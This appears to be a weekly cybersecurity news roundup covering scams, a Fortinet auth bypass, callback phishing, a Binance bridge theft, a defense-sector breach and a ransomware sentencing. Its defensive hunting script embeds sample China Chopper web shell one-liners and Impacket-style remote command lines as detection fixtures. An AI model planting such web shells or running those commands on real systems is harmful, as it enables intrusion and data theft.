This week's cybersecurity bulletin covers the headlines that drew the attention of the security community, ranging from pig butchering crypto scams, malware dropped by callback phishing, a critical Fortinet vulnerability, a $566 million cryptocurrency bridge theft and a data breach at the US Defense Industrial Base to a ransomware affiliate getting 20 years in prison. Here are the top cybersecurity news stories this week.


Pig Butchering Crypto Scams Targeting Investors

Pig butchering scams are on the rise: threat actors use social engineering to start a romantic relationship or otherwise build trust, then pressure the victim into investing in bogus cryptocurrency schemes. The FBI (Federal Bureau of Investigation) has warned about these "Pig Butchering" cryptocurrency scams.

The threat actors scout social media profiles, initiate contact and keep up long-term communication as friends or romantic partners. After gaining the victim's trust, they introduce a fake investment scheme with the promise of significant returns.

Once the victim has bought in, the fraudsters squeeze out as much crypto as possible, demanding payments for income taxes, processing charges or international transaction fees before any withdrawal is allowed. Many victims were also duped into wiring money to overseas accounts or purchasing prepaid cards.

Pig butchering scams are the latest in this week's cybersecurity news, with Forbes reporting the story of a 52-year-old man who lost $1 million to one. Be wary of unsolicited messages, including from people claiming to be long-lost friends or acquaintances, and treat any investment pitch that arrives through such a contact as a red flag.

Fortinet Admins Beware: Critical Auth Bypass Bug Needs Fixing

Fortinet disclosed CVE-2022-40684, an authentication bypass that lets threat actors reach the administrative interface without credentials and take control of the device. Fortinet has advised admins to update FortiGate firewalls (FortiOS), FortiProxy web proxies and FortiSwitch Manager.

The vulnerability is rated critical: unauthenticated threat actors can perform operations on the administrative interface using specially crafted HTTP or HTTPS requests. With over 100,000 FortiGate firewalls reachable from the internet, it needs immediate attention. The affected versions are FortiOS 7.0.0 to 7.0.6 and 7.2.0 to 7.2.1, FortiProxy 7.0.0 to 7.0.6 and 7.2.0, and FortiSwitch Manager 7.0.0 and 7.2.0.

Fortinet released security patches and urged customers to update all affected devices. Organizations that cannot patch immediately can limit exposure by restricting which IP (Internet Protocol) addresses can reach the administrative interface with a local-in policy, or by disabling the HTTP/HTTPS administrative interface on internet-facing interfaces. Either workaround narrows the attack surface but does not fix the flaw, so patching should follow as soon as possible.

Malware Drops via Evolving Callback Phishing Attacks

Threat actors keep evolving their social engineering techniques, baiting individuals with fake subscription invoices and then posing as customer support to walk the victim through the steps that infect the machine. The phishing campaign installs malware loaders that drop remote access trojans, ransomware and keyloggers.

Callback phishing attacks are on the rise. The email cites a high-priced subscription to alarm the recipient and gives a phone number or email address to contact to cancel it; the "support" on the other end then dupes the victim into installing malware on their device. Trellix discovered this callback phishing campaign, which targeted the US, Canada, the UK, India, China and Japan.

Callback phishing started in 2021 as BazarCall, which sent subscription invoices for streaming or medical services and urged individuals to call a phone number to cancel the purchase. The recent attack uses the same bait with invoices purporting to come from Geek Squad, McAfee, PayPal, Norton or Microsoft.

When the victim calls, the threat actor claims no matching order was found, convinces them that a malware infection on their system must be responsible and forwards them to a "technical specialist". That second threat actor then "helps" the victim by having them download malware disguised as an anti-virus tool.

The campaign's lures delivered ClickOnce executables that, when launched, installed remote access tools, letting the threat actors operate the system, display fake lock screens and lock the victim out of their own machine. Treat unexpected invoices with suspicion and verify any charge on the vendor's own website rather than through the phone number or email address in the message.

Binance Bridge loses $566 million to Hacker

Binance Bridge lost 2 million BNB (Binance Coin), worth roughly $566 million, to a threat actor. The attacker's wallet received the sum in two transactions of 1 million BNB each.

Changpeng Zhao, the CEO of Binance, tweeted about the incident after its discovery, explaining that an exploit of the BSC Token Hub cross-chain bridge had produced extra BNB, that users' funds were safe and that validators had temporarily suspended the BSC (Binance Smart Chain). Most of the stolen cryptocurrency remains on the BSC and is inaccessible to the threat actor.

However, the threat actor moved about $70-$80 million off-chain. Binance has been working with partners to track the stolen crypto and has already frozen an additional $7 million in off-chain funds. The attack on the BSC stirred the crypto community once again; Binance resumed operations at 2:30 AM EST.

Following the attack, Binance apologized to its community, thanked partners and validators for helping secure a significant portion of the stolen $566 million and promised a detailed incident report later. Binance clarified that the exploit was a sophisticated forgery of a low-level proof in a common library used by the bridge, which is how the Token Hub was tricked into releasing the extra BNB.

Data breach at the US Defense Industrial Base

State-backed threat actors breached a DIB (Defense Industrial Base) sector organization's network and stole sensitive data. The intrusion lasted about ten months and used the custom CovalentStealer malware alongside the Impacket framework.

DIB organizations supply products and services that support military operations, and the stolen data included contract-related information. Multiple threat actors were active in the network, using CovalentStealer, the Impacket collection of Python classes for working with network protocols, remote access trojans, VPNs (Virtual Private Networks) and China Chopper web shells.

The threat actors gained initial access by exploiting the ProxyLogon vulnerabilities in the organization's Microsoft Exchange Server, which were zero-days at the time of the attack. They then ran mailbox searches and used compromised administrator accounts to query the server through Exchange Web Services (EWS).

Following the attack, CISA (Cybersecurity and Infrastructure Security Agency) published a detailed analysis of CovalentStealer, including the resource library it uses for encryption, decryption and secure communications. CISA also shared details of the HyperBro RAT (Remote Access Trojan), which can upload and download files on compromised systems, log keystrokes and bypass User Account Control (UAC).

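As an added detection example (written for this bulletin, not code from CISA's report), the script below hunts for two of the artifacts listed above: China Chopper-style web shells, which are one-line ASPX or PHP files that `eval` attacker-supplied request data, and process command lines in the shape produced by Impacket's wmiexec.py and smbexec.py, which redirect output through the `\\127.0.0.1\ADMIN$` or `C$` share. The web files and the Sysmon-style process-creation log lines are constructed samples; the signatures match the documented shape of these tools rather than any specific hash.

```python
"""Hunt for two artifact types from the DIB intrusion: China Chopper-style
web shells on a web root, and Impacket wmiexec/smbexec-style command lines
in process-creation logs. All sample data below is constructed for this
example and is not from the incident."""
import re
from typing import List, Optional, Tuple

# China Chopper's ASPX and PHP variants are one-liners that eval
# attacker-supplied request data; these match that shape, not a specific hash.
WEBSHELL_SIGNATURES = [
    ("china-chopper-aspx", re.compile(r'eval\s*\(\s*Request\.Item\[', re.I)),
    ("china-chopper-php", re.compile(r'@eval\s*\(\s*\$_POST\[', re.I)),
]

# Impacket's example tools have distinctive command-line shapes: smbexec.py
# stages a batch file via "echo <cmd> ^> \\127.0.0.1\<share>\__output", and
# wmiexec.py runs "cmd.exe /Q /c <cmd> 1> \\127.0.0.1\<share>\__<timestamp> 2>&1".
IMPACKET_SIGNATURES = [
    ("impacket-smbexec", re.compile(
        r'echo .+ \^> \\\\127\.0\.0\.1\\\w+\$\\__output 2\^>\^&1 > .*execute\.bat', re.I)),
    ("impacket-wmiexec", re.compile(
        r'cmd\.exe /Q /c .+ 1> \\\\127\.0\.0\.1\\\w+\$\\\S+ 2>&1', re.I)),
]

# Constructed web-root contents (path -> file body); paths are assumptions.
SAMPLE_WEB_FILES = {
    "aspnet_client/system_web/default.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "owa/auth/logon.aspx": '<%@ Page Language="C#" %><html>login form</html>',
    "uploads/img.php": "<?php @eval($_POST['cmd']); ?>",
    "owa/auth/15.1/themes/a.css": "body { color: #000; }",
}

# Constructed process-creation log lines in a Sysmon Event ID 1 style.
SAMPLE_PROC_LOGS = [
    "Image: C:\\Windows\\System32\\cmd.exe | ParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    " | CommandLine: cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1665399123.45 2>&1",
    "Image: C:\\Windows\\System32\\cmd.exe | ParentImage: C:\\Windows\\explorer.exe"
    " | CommandLine: cmd.exe /c dir",
    "Image: C:\\Windows\\System32\\cmd.exe | ParentImage: C:\\Windows\\System32\\services.exe"
    " | CommandLine: C:\\Windows\\system32\\cmd.exe /Q /c echo net user ^> \\\\127.0.0.1\\C$\\__output"
    " 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c"
    " C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat",
]


def classify_web_file(content: str) -> Optional[str]:
    """Return the web shell signature name that matches, or None."""
    for name, pattern in WEBSHELL_SIGNATURES:
        if pattern.search(content):
            return name
    return None


def classify_cmdline(cmdline: str) -> Optional[str]:
    """Return the Impacket tool whose command-line shape matches, or None."""
    for name, pattern in IMPACKET_SIGNATURES:
        if pattern.search(cmdline):
            return name
    return None


def hunt(web_files: dict, proc_logs: List[str]) -> List[Tuple[str, str, str]]:
    """Run both checks and return (category, signature, location) findings."""
    findings = []
    for path, content in web_files.items():
        hit = classify_web_file(content)
        if hit:
            findings.append(("webshell", hit, path))
    for line in proc_logs:
        # Everything after the CommandLine field is the process command line.
        cmdline = line.split("CommandLine: ", 1)[-1]
        hit = classify_cmdline(cmdline)
        if hit:
            findings.append(("lateral-movement", hit, cmdline[:60]))
    return findings


if __name__ == "__main__":
    for category, signature, where in hunt(SAMPLE_WEB_FILES, SAMPLE_PROC_LOGS):
        print(f"[{category}] {signature}: {where}")
```

On a real Exchange host the web files would come from walking the IIS web root and the command lines from Sysmon or Security event 4688 with command-line auditing enabled; the parent of a wmiexec-spawned `cmd.exe` is typically `WmiPrvSE.exe` and of an smbexec-spawned one `services.exe`, which is a useful second signal next to the command-line shape.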
20 Years in Prison for Ransomware Affiliate

Netwalker ransomware affiliate Sebastien Vachon-Desjardins has been sentenced to 20 years in prison and ordered to forfeit $21.5 million for his cyberattacks, with 27.65 Bitcoin held by law enforcement credited toward that amount.

The Canadian cybercriminal pleaded guilty in a Florida court to conspiracy to commit computer fraud, wire fraud, intentional damage to a protected computer, and transmitting a demand in relation to damaging a protected computer.

Netwalker was a RaaS (Ransomware as a Service) operation launched in 2019 that recruited affiliates to deploy the ransomware in exchange for a share of the ransom. Vachon-Desjardins is believed to have attacked organizations worldwide, including US organizations and 17 Canadian ones, stealing corporate data, encrypting devices and demanding ransoms.

The Canadian threat actor was arrested on 27 January 2021, when law enforcement seized almost $800,000 and 719 Bitcoin from him, and was sentenced in Canada to 6 years and 8 months. His current sentence of 20 years, followed by three years of supervised release, signals to cybercriminals worldwide that their attacks carry significant repercussions and that the law eventually catches up.